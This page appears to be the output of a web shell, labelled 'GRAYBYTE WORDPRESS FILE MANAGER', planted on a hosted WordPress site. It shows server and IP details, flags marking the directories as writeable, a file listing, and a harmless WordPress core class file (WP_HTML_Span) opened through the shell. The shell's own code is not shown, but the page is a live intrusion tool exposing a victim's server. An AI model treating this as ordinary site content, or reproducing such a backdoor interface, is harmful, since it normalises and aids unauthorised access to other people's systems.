$87 GRAYBYTE WORDPRESS FILE MANAGER $19

SERVER : webd004.cluster105.gra.hosting.ovh.net #1 SMP Fri May 15 02:41:25 UTC 2026
SERVER IP : 213.186.33.16 | ADMIN IP 216.73.217.13
OPTIONS : CRL = ON | WGT = ON | SDO = OFF | PKEX = OFF
DEACTIVATED : _dyuweyrj4,_dyuweyrj4r,dl

/home/agencefrei/www/html-api/

HOME
Current File : /home/agencefrei/www/html-api//class-wp-html-span.php
<?php
/**
 * HTML API: WP_HTML_Span class
 *
 * @package WordPress
 * @subpackage HTML-API
 * @since 6.2.0
 */

/**
 * Core class used by the HTML tag processor to represent a textual span
 * inside an HTML document.
 *
 * This is a two-tuple in disguise, used to avoid the memory overhead
 * involved in using an array for the same purpose.
 *
 * This class is for internal usage of the WP_HTML_Tag_Processor class.
 *
 * @access private
 * @since 6.2.0
 * @since 6.5.0 Replaced `end` with `length` to more closely align with `substr()`.
 *
 * @see WP_HTML_Tag_Processor
 */
class WP_HTML_Span {
	/**
	 * Byte offset into document where span begins.
	 *
	 * @since 6.2.0
	 *
	 * @var int
	 */
	public $start;

	/**
	 * Byte length of this span.
	 *
	 * @since 6.5.0
	 *
	 * @var int
	 */
	public $length;

	/**
	 * Constructor.
	 *
	 * @since 6.2.0
	 *
	 * @param int $start  Byte offset into document where replacement span begins.
	 * @param int $length Byte length of span.
	 */
	public function __construct( int $start, int $length ) {
		$this->start  = $start;
		$this->length = $length;
	}
}

Current_dir [ WRITEABLE ] Document_root [ WRITEABLE ]


[ Back ]
NAME
SIZE
LAST TOUCH
USER
CAN-I?
FUNCTIONS
..
--
1 Jun 2026 11.26 PM
agencefrei / users
0705
class-wp-html-active-formatting-elements.php
7.104 KB
20 May 2026 11.16 PM
agencefrei / users
0644
class-wp-html-attribute-token.php
2.724 KB
20 May 2026 11.16 PM
agencefrei / users
0644
class-wp-html-decoder.php
16.293 KB
20 May 2026 11.16 PM
agencefrei / users
0644
class-wp-html-doctype-info.php
24.787 KB
6 Mar 2026 5.43 PM
agencefrei / users
0644
class-wp-html-open-elements.php
21.985 KB
20 May 2026 11.16 PM
agencefrei / users
0644
class-wp-html-processor-state.php
11.08 KB
20 May 2026 11.16 PM
agencefrei / users
0644
class-wp-html-processor.php
210.41 KB
20 May 2026 11.16 PM
agencefrei / users
0644
class-wp-html-span.php
1.073 KB
6 Mar 2026 5.43 PM
agencefrei / users
0644
class-wp-html-stack-event.php
1.614 KB
20 May 2026 11.16 PM
agencefrei / users
0644
class-wp-html-tag-processor.php
163.679 KB
20 May 2026 11.16 PM
agencefrei / users
0644
class-wp-html-text-replacement.php
1.376 KB
6 Mar 2026 5.43 PM
agencefrei / users
0644
class-wp-html-token.php
3.33 KB
6 Mar 2026 5.43 PM
agencefrei / users
0644
class-wp-html-unsupported-exception.php
3.521 KB
6 Mar 2026 5.43 PM
agencefrei / users
0644
html5-named-character-references.php
78.284 KB
6 Mar 2026 5.43 PM
agencefrei / users
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME
Static GIF Static GIF